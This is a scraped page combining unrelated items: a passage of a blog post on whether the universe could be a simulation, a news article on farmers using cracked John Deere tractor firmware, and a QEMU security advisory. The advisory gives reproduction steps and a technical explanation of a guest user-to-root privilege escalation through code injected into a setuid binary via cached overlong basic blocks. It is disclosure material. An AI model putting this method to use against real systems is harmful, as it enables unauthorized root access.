After hammering home that point, Sabine goes further, and says that the simulation hypothesis is almost ruled out, by (for example) the fact that our universe is Lorentz-invariant, and a simulation of our world by a discrete lattice of bits won’t reproduce Lorentz-invariance or other continuous symmetries.

In writing his post, Ryan Mandelbaum interviewed two people: Sabine and me.

I basically told Ryan that I agree with Sabine insofar as she argues that the simulation hypothesis is lazy—that it doesn’t pay its rent by doing real explanatory work, doesn’t even engage much with any of the deep things we’ve learned about the physical world—and disagree insofar as she argues that the simulation hypothesis faces some special difficulty because of Lorentz-invariance or other continuous phenomena in known physics.  In short: blame it for being unfalsifiable rather than for being falsified!

Indeed, to whatever extent we believe the Bekenstein bound—and even more pointedly, to whatever extent we think the AdS/CFT correspondence says something about reality—we believe that in quantum gravity, any bounded physical system (with a short-wavelength cutoff, yada yada) lives in a Hilbert space of a finite number of qubits, perhaps ~1069 qubits per square meter of surface area.  And as a corollary, if the cosmological constant is indeed constant (so that galaxies more than ~20 billion light years away are receding from us faster than light), then our entire observable universe can be described as a system of ~10122 qubits.  The qubits would in some sense be the fundamental reality, from which Lorentz-invariant spacetime and all the rest would need to be recovered as low-energy effective descriptions.  (I hasten to add: there’s of course nothing special about qubits here, any more than there is about bits in classical computation, compared to some other unit of information—nothing that says the Hilbert space dimension has to be a power of 2 or anything silly like that.)  Anyway, this would mean that our observable universe could be simulated by a quantum computer—or even for that matter by a classical computer, to high precision, using a mere ~210^122 time steps.

Sabine might respond that AdS/CFT and other quantum gravity ideas are mere theoretical speculations, not solid and established like special relativity.  But crucially, if you believe that the observable universe couldn’t be simulated by a computer even in principle—that it has no mapping to any system of bits or qubits—then at some point the speculative shoe shifts to the other foot.  The question becomes: do you reject the Church-Turing Thesis?  Or, what amounts to the same thing: do you believe, like Roger Penrose, that it’s possible to build devices in nature that solve the halting problem or other uncomputable problems?  If so, how?  But if not, then how exactly does the universe avoid being computational, in the broad sense of the term?

I’d write more, but by coincidence, right now I’m at an It from Qubit meeting at Stanford, where everyone is talking about how to map quantum theories of gravity to quantum circuits acting on finite sets of qubits, and the questions in quantum circuit complexity that are thereby raised.  It’s tremendously exciting—the mixture of attendees is among the most stimulating I’ve ever encountered, from Lenny Susskind and Don Page and Daniel Harlow to Umesh Vazirani and Dorit Aharonov and Mario Szegedy to Google’s Sergey Brin.  But it should surprise no one that, amid all the discussion of computation and fundamental physics, the question of whether the universe “really” “is” a simulation has barely come up.  Why would it, when there are so many more fruitful things to ask?  All I can say with confidence is that, if our world is a simulation, then whoever is simulating it (God, or a bored teenager in the metaverse) seems to have a clear preference for the 2-norm over the 1-norm, and for the complex numbers over the reals.

Close this section

The Cracking Monolith: Forces That Call for Microservices

Close this section

The thriving black market of John Deere tractor hacking

To avoid the draconian locks that John Deere puts on the tractors they buy, farmers throughout America's heartland have started hacking their equipment with firmware that's cracked in Eastern Europe and traded on invite-only, paid online forums.

Tractor hacking is growing increasingly popular because John Deere and other manufacturers have made it impossible to perform "unauthorized" repair on farm equipment, which farmers see as an attack on their sovereignty and quite possibly an existential threat to their livelihood if their tractor breaks at an inopportune time.

"When crunch time comes and we break down, chances are we don't have time to wait for a dealership employee to show up and fix it," Danny Kluthe, a hog farmer in Nebraska, told his state legislature earlier this month. "Most all the new equipment [requires] a download [to fix]."

The nightmare scenario, and a fear I heard expressed over and over again in talking with farmers, is that John Deere could remotely shut down a tractor and there wouldn't be anything a farmer could do about it.

"What you've got is technicians running around here with cracked Ukrainian John Deere software that they bought off the black market"

A license agreement John Deere required farmers to sign in October forbids nearly all repair and modification to farming equipment, and prevents farmers from suing for "crop loss, lost profits, loss of goodwill, loss of use of equipment … arising from the performance or non-performance of any aspect of the software." The agreement applies to anyone who turns the key or otherwise uses a John Deere tractor with embedded software. It means that only John Deere dealerships and "authorized" repair shops can work on newer tractors.

"If a farmer bought the tractor, he should be able to do whatever he wants with it," Kevin Kenney, a farmer and right-to-repair advocate in Nebraska, told me. "You want to replace a transmission and you take it to an independent mechanic—he can put in the new transmission but the tractor can't drive out of the shop. Deere charges $230, plus $130 an hour for a technician to drive out and plug a connector into their USB port to authorize the part."

"What you've got is technicians running around here with cracked Ukrainian John Deere software that they bought off the black market," he added.

Image: Cartec-Systems

Kenney and Kluthe have been pushing for right-to-repair legislation in Nebraska that would invalidate John Deere's license agreement (seven other states are considering similar bills). In the meantime, farmers have started hacking their machines because even simple repairs are made impossible by the embedded software within the tractor. John Deere is one of the staunchest opponents of this legislation.

"There's software out there a guy can get his hands on if he looks for it," one farmer and repair mechanic in Nebraska who uses cracked John Deere software told me. "I'm not a big business or anything, but let's say you've got a guy here who has a tractor and something goes wrong with it—the nearest dealership is 40 miles away, but you've got me or a diesel shop a mile away. The only way we can fix things is illegally, which is what's holding back free enterprise more than anything and hampers a farmer's ability to get stuff done, too."

Radio Motherboard is available on all podcast apps and iTunes

I went searching for one of the forums where pirated John Deere firmware is sold. After I found it, I couldn't do much of anything without joining. I was sent an email with instructions, which required me to buy a $25 dummy diagnostic part from a third-party website. Instead of the part, I was sent a code to join the forum.

Once I was on it, I found dozens of threads from farmers desperate to fix and modify their own tractors. According to people on the forums and the farmers who use it, much of the software is cracked in Eastern European countries such as Poland and Ukraine and then sold back to farmers in the United States.

Among the programs I saw being traded:

John Deere Service Advisor: A diagnostic program used by John Deere technicians that recalibrate tractors and can diagnose broken parts. "It can program payloads into different controllers. It can calibrate injectors, turbo, engine hours and all kinds of fun stuff," someone familiar with the software told me.
John Deere Payload files: These are files that specifically program certain parts of the vehicle. There are files that can customize and fine-tune the performance of the chassis, engine, and cab, for instance.
John Deere Electronic Data Link drivers: This is software that allows a computer to talk to the tractor. "The EDL is the required interface which allows the Service Advisor laptop to actually communicate with the tractor controllers," the source told me.

A reverse engineer who goes by Decryptor Tuning, who I met on a forum, told me they distribute programs that are "usually OEM software that is freely available but must be licensed."

Image: AlienTechUK

"If things could get better, [companies like John Deere] should be forced to freely distribute the same software dealers have," they said. "And stop locking down [Engine Control Module] reading functionality. They do this to force you to use their services, which they have a 100 percent monopoly on."

Also for sale (or free download) on the forums are license key generators, speed-limit modifiers, and reverse-engineered cables that allow you to connect a tractor to a computer. These programs are also for sale on several sketchy-looking websites that are hosted in Europe, and on YouTube there are demos of the software in operation.

On its face, pirating such software would seem to be illegal. But in 2015, the Librarian of Congress approved an exemption to the Digital Millennium Copyright Act for land vehicles, which includes tractors. The exemption allows modification of "computer programs that are contained in and control the functioning of a motorized land vehicle such as a personal automobile, commercial motor vehicle or mechanized agricultural vehicle … when circumvention is a necessary step undertaken by the authorized owner of the vehicle to allow the diagnosis, repair, or lawful modification of a vehicle function."

This means modification of embedded software is legal long as it can still meet emission requirements. Whether the exemption allows for the downloading of cracked software is an unanswered question.

"Are we supposed to throw the tractor in the garbage, or what?"

It's no surprise, then, that John Deere started requiring farmers to sign licensing agreements around the time the exemption went into effect. Violation of the agreement would be considered a breach of contract rather than a federal copyright violation, meaning John Deere would have to sue its own customers if it wants the contract to be enforced. I asked John Deere specifically about the fact that a software black market has cropped up for its tractors, but the company instead said that there are no repair problems for John Deere customers.

"When a customer buys John Deere equipment, he or she owns the equipment," the company said. "As the owner, he or she has the ability to maintain and repair the equipment. The customer also has the ability through operator and service manuals and other resources to enable operational, maintenance, service and diagnostics activities to repair and maintain equipment."

"Software modifications increase the risk that equipment will not function as designed," the company continued. "As a result, allowing unqualified individuals to modify equipment software can endanger machine performance, in addition to Deere customers, dealers and others, resulting in equipment that no longer complies with industry and safety/environmental regulations."

Gay Gordon-Byrne, executive director of Repair.org, a trade organization fighting for right-to-repair legislation, told me that John Deere's statement is "total crap," and noted that "some of our members have repeatedly attempted to buy the diagnostics that are referenced [from John Deere] and been rebuffed."

"They require buyers to accept an End User License Agreement that disallows all of the activities they say are allowed in their statement," she said. "Deere is a monopolist and has systematically taken over the role of equipment owner, despite having been paid fairly and fully for equipment. Their claims to control equipment post-purchase are inconsistent with all aspects of ownership including accounting, taxation, and transfer of products into the secondary market."

It's quite simple, really. John Deere sold farmers their tractors, but has used software to maintain control of every aspect of its use after the sale. Kluthe, for example, uses pig manure to power his tractor, which requires engine modifications that would likely violate John Deere's terms of service on newer machines.

"I take the hog waste and run it through an anaerobic digester and I've learned to compress the methane," he said. "I run an 80 percent methane in my Chevy Diesel Pickup and I run 90 percent methane in my tractor. And they both purr. I take a lot of pride in working on my equipment."

Farmers worry what will happen if John Deere is bought by another company, or what will happen if the company decides to stop servicing its tractors. And so they have taken matters into their own hands by taking control of the software themselves.

"What happens in 20 years when there's a new tractor out and John Deere doesn't want to fix these anymore?" the farmer using Ukrainian software told me. "Are we supposed to throw the tractor in the garbage, or what?"

If you work for a John Deere dealership or are a farmer who has been hurt by the company's stance on repair, tell me your story—here's how you can contact me securely.

Subscribe to pluspluspodcast, Motherboard's new show about the people and machines that are building our future.

Close this section

QEMU: user-to-root privesc inside VM via bad translation caching

This is a security issue in QEMU's system emulation for X86. The issue
permits an attacker who can execute code in guest ring 3 with normal
user privileges to inject code into other processes that are running
in guest ring 3, in particular root-owned processes.


== reproduction steps ==

 - Create an x86-64 VM and install Debian Jessie in it. The following
   steps should all be executed inside the VM.
 - Verify that procmail is installed and the correct version:
       root@qemuvm:~# apt-cache show procmail | egrep 'Version|SHA'
       Version: 3.22-24
       SHA1: 54ed2d51db0e76f027f06068ab5371048c13434c
       SHA256: 4488cf6975af9134a9b5238d5d70e8be277f70caa45a840dfbefd2dc444bfe7f
 - Install build-essential and nasm ("apt install build-essential nasm").
 - Unpack the exploit, compile it and run it:
       user@qemuvm:~$ tar xvf procmail_cache_attack.tar
       procmail_cache_attack/
       procmail_cache_attack/shellcode.asm
       procmail_cache_attack/xp.c
       procmail_cache_attack/compile.sh
       procmail_cache_attack/attack.c
       user@qemuvm:~$ cd procmail_cache_attack
       user@qemuvm:~/procmail_cache_attack$ ./compile.sh 
       user@qemuvm:~/procmail_cache_attack$ ./attack 
       memory mappings set up
       child is dead, codegen should be complete
       executing code as root! :)
       root@qemuvm:~/procmail_cache_attack# id
       uid=0(root) gid=0(root) groups=0(root),[...]

Note: While the exploit depends on the precise version of procmail,
the actual vulnerability is in QEMU, not in procmail. procmail merely
serves as a seldomly-executed setuid root binary into which code can
be injected.


== detailed issue description ==
QEMU caches translated basic blocks. To look up a translated basic
block, the function tb_find() is used, which uses tb_htable_lookup()
in its slowpath, which in turn compares translated basic blocks
(TranslationBlock) to the lookup information (struct tb_desc) using
tb_cmp().

tb_cmp() attempts to ensure (among other things) that both the virtual
start address of the basic block and the physical addresses that the
basic block covers match. When checking the physical addresses, it
assumes that a basic block can span at most two pages.

gen_intermediate_code() attempts to enforce this by stopping the
translation of a basic block if nearly one page of instructions has
been translated already:

    /* if too long translation, stop generation too */
    if (tcg_op_buf_full() ||
        (pc_ptr - pc_start) >= (TARGET_PAGE_SIZE - 32) ||
        num_insns >= max_insns) {
        gen_jmp_im(pc_ptr - dc->cs_base);
        gen_eob(dc);
        break;
    }

However, while real X86 processors have a maximum instruction length
of 15 bytes, QEMU's instruction decoder for X86 does not place any
limit on the instruction length or the number of instruction prefixes.
Therefore, it is possible to create an arbitrarily long instruction
by e.g. prepending an arbitrary number of LOCK prefixes to a normal
instruction. This permits creating a basic block that spans three
pages by simply appending an approximately page-sized instruction to
the end of a normal basic block that starts close to the end of a
page.

Such an overlong basic block causes the basic block caching to fail as
follows: If code is generated and cached for a basic block that spans
the physical pages (A,E,B), this basic block will be returned by
lookups in a process in which the physical pages (A,B,C) are mapped
in the same virtual address range (assuming that all other lookup
parameters match).

This behavior can be abused by an attacker e.g. as follows: If a
non-relocatable world-readable setuid executable legitimately contains
the pages (A,B,C), an attacker can map (A,E,B) into his own process,
at the normal load address of A, where E is an attacker-controlled
page. If a legitimate basic block spans the pages A and B, an attacker
can write arbitrary non-branch instructions at the start of E, then
append an overlong instruction
that ends behind the start of C, yielding a modified basic block that
spans all three pages. If the attacker then executes the modified
basic block in his process, the modified basic block is cached.
Next, the attacker can execute the setuid binary, which will reuse the
cached modified basic block, executing attacker-controlled
instructions in the context of the privileged process.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
 

Close this section